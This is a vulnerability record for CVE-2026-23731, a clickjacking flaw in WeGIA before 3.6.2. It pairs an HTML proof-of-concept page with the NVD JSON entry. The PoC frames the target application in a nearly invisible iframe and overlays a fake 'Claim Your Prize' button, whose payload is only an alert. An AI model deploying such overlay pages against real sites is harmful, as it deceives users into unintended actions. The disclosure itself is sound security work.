CVE-2026-23731

<!-- CVE-2026-23731 Clickjacking PoC --> <!-- This PoC demonstrates how an attacker can embed WeGIA in an iframe --> <!-- and overlay deceptive elements to perform clickjacking attacks --> <!DOCTYPE html> <html lang="en"> <head> <meta charset="UTF-8"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <title>WeGIA Clickjacking PoC - CVE-2026-23731</title> <style> body { margin: 0; padding: 20px; font-family: Arial, sans-serif; background: linear-gradient(135deg, #667eea 0%, #764ba2 100%); min-height: 100vh; display: flex; justify-content: center; align-items: center; } .container { text-align: center; background: white; padding: 40px; border-radius: 15px; box-shadow: 0 10px 40px rgba(0,0,0,0.3); } h1 { color: #333; margin-bottom: 20px; } .poc-description { color: #666; margin-bottom: 30px; line-height: 1.6; } .clickjack-container { position: relative; width: 100%; max-width: 600px; height: 400px; margin: 0 auto; border: 3px solid #667eea; border-radius: 10px; overflow: hidden; } /* The vulnerable WeGIA page embedded in iframe */ .target-iframe { width: 100%; height: 100%; opacity: 0.15; position: absolute; top: 0; left: 0; z-index: 1; } /* Malicious overlay button */ .malicious-overlay { position: absolute; z-index: 2; background: linear-gradient(45deg, #ff6b6b, #ee5a24); color: white; border: none; padding: 15px 30px; font-size: 18px; font-weight: bold; cursor: pointer; border-radius: 25px; box-shadow: 0 4px 15px rgba(0,0,0,0.3); top: 50%; left: 50%; transform: translate(-50%, -50%); } .malicious-overlay:hover { background: linear-gradient(45deg, #ee5a24, #ff6b6b); box-shadow: 0 6px 20px rgba(0,0,0,0.4); } .fake-content { position: absolute; top: 10px; left: 10px; right: 10px; background: rgba(255,255,255,0.95); padding: 10px; border-radius: 5px; z-index: 3; font-size: 12px; color: #333; } .warning { background: #fff3cd; border: 1px solid #ffc107; color: #856404; padding: 15px; border-radius: 5px; margin-top: 20px; font-size: 14px; } </style> </head> <body> <div class="container"> <h1>Clickjacking PoC - CVE-2026-23731</h1> <p class="poc-description"> This PoC demonstrates the clickjacking vulnerability in WeGIA < 3.6.2.<br> The page below embeds the vulnerable WeGIA application in an iframe.<br> The red button appears to be a harmless button, but it actually<br> overlays a sensitive action button in the WeGIA application. </p> <div class="clickjack-container"> <!-- Vulnerable WeGIA page embedded in iframe --> <iframe class="target-iframe" src="http://target-website.com/WeGIA" scrolling="no" frameborder="0"> </iframe> <!-- Fake content to deceive users --> <div class="fake-content"> <strong>🎁 Special Offer!</strong><br> Click the button below to claim your prize! </div> <!-- Malicious overlay button --> <button class="malicious-overlay" onclick="alert('Clickjacking attack triggered!\nIn real attack, this would submit a sensitive form or perform an unintended action.')"> Claim Your Prize → </button> </div> <div class="warning"> ⚠️ <strong>Educational Purpose Only:</strong> This PoC is for security research and vulnerability assessment. </div> </div> </body> </html>

{"cve": {"id": "CVE-2026-23731", "sourceIdentifier": "[email protected]", "published": "2026-01-16T20:15:51.327", "lastModified": "2026-01-30T18:30:32.513", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "WeGIA is a web manager for charitable institutions. Prior to 3.6.2, The web application is vulnerable to clickjacking attacks. The WeGIA application does not send any defensive HTTP headers related to framing protection. In particular, X-Frame-Options is missing andContent-Security-Policy with frame-ancestors directive is not configured. Because of this, an attacker can load any WeGIA page inside a malicious HTML document, overlay deceptive elements, hide real buttons, or force accidental interaction with sensitive workflows. This vulnerability is fixed in 3.6.2."}, {"lang": "es", "value": "WeGIA es un gestor web para instituciones benéficas. Anterior a 3.6.2, la aplicación web es vulnerable a ataques de clickjacking. La aplicación WeGIA no envía ningún encabezado HTTP defensivo relacionado con la protección contra el encuadre. En particular, falta X-Frame-Options y Content-Security-Policy con la directiva frame-ancestors no está configurado. Debido a esto, un atacante puede cargar cualquier página de WeGIA dentro de un documento HTML malicioso, superponer elementos engañosos, ocultar botones reales o forzar la interacción accidental con flujos de trabajo sensibles. Esta vulnerabilidad está corregida en 3.6.2."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N", "baseScore": 4.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-1021"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:wegia:wegia:*:*:*:*:*:*:*:*", "versionEndExcluding": "3.6.2", "matchCriteriaId": "419B3A85-5754-4198-A73E-92A9DA8E7A68"}]}]}], "references": [{"url": "https://github.com/LabRedesCefetRJ/WeGIA/pull/1333", "source": "[email protected]", "tags": ["Issue Tracking", "Patch"]}, {"url": "https://github.com/LabRedesCefetRJ/WeGIA/releases/tag/3.6.2", "source": "[email protected]", "tags": ["Release Notes"]}, {"url": "https://github.com/LabRedesCefetRJ/WeGIA/security/advisories/GHSA-99qp-hjvh-c59q", "source": "[email protected]", "tags": ["Exploit", "Mitigation", "Vendor Advisory"]}]}}